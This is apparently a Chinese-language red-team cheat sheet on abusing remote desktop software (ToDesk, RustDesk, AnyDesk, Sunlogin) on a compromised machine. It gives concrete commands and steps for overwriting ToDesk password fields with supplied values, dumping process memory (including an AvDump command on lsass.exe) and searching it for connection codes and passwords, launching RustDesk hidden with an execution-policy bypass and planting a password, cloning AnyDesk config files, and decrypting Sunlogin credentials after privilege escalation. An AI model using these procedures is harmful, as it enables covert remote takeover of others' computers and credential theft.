远程desk工具利用总结

NO.1 Todesk

根据目标软件安装情况有以下两种利用方法

1.目标机已有完整版todesk。

1）改配置文件。

老版本可替换至本地查看密码(此法在最近更新的几个版本中已经失效)，新版本只可更改密码。

改C:\Program Files (x86)\ToDesk下conf.ini文件tempAuthPassEx字段

tga5h42d

b219c2a861e176d319b0a4e0463896d4af2a02ed7bc88da794541701b46f1af2fc4a9864ae00772cc8d924a801bdaaa3b47fbd2fa637ac4b

65tu07zr

11a48a2981bfda260f2f1a890a97b2ed9fcb9b48a262d20e3a68f6c56d6790cd910e1618a7747df448922b0cfe16c284728d28864923d3c8

kill进程重启即可。

2）内存读密码

userInfo.json和devlist_xx.json文件有userid（连接码）

dump内存,搜索连接码，上下几行会有密码

4.3.3以下临时密码为6位数字

2.目标机无todest，安装官方精简版

dump内存 仅测试4.3.3.0

运行精简版（需bypassUAC），dump子进程（主进程为system权限）

AvDump.exe是Avast杀毒软件中自带的一个程序，可用于转储指定进程（lsass.exe）内存数据，它带有Avast杀软数字签名。

AvDump.exe --pid 954 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

可通过定位被控端版本 4.3.3.0 、主机名、公网ip、系统版本（更准确），来找到相应位置。

*shell快速提取，不一定有效，密码可能在输出的前后两行

设置utf-8

CHCP 65001

1）连接码

shell findstr "20220829" C:\Users\Public\tod.dmp 时间定位

shell findstr "ip地址" C:\Users\Public\tod.dmp ip定位

2）连接密码

主要靠系统版本号定位，具体看连接码定位字符串显示的版本号

shell findstr "19044" C:\Users\Public\tod.dmp

通常为8位数，数字字母混合

NO.2 Rustdesk

单机版，无需绕UAC，但部分软件操作会提示UAC。

配置文件地址

C:\Users\username\AppData\Roaming\RustDesk\config\RustDesk.toml

使用powershell可以无窗口执行

powershell-executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/user/rust.exe'

第一次运行rustdesk会生成配置文件，然后结束进程

taskkill/f /t /im rust.exe

在配置文件中添加密码，6位数密码

在内网还可配置直连功能RustDesk2.toml

[options]
direct-server='Y'
direct-access-port='8443'

NO.3 Anydesk

复制本地C:\Users\guoguang\AppData\Roaming\AnyDesk 下四个文件到远程主机上

删除本地文件，重启开启连接

NO.4 向日葵

自从向日葵12.5版本后，原encry_pwd和fastcode字段已经不在配置文件config.ini和注册表HKEY_USERS.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo内

解决方案一

根据分析，上述字段移动至C:\ProgramData\Oray\SunloginClient\sys_config.ini中

此配置文件默认需要SYSTEM权限才可以读取

提权后拿到id和加密后的密码，经测试算法没变，通过现有项目解密即可 https://github.com/wafinfo/Sunflower_get_Password

解决方案二

通过dump内存的方式匹配明文字符串获取，参考： https://red.rizhan.icu/?thread-176.htm

id正则为k[0-9]{8,}

密码正则为>[a-z0-9]{6}，每次刷新后密码的均会保存在内存中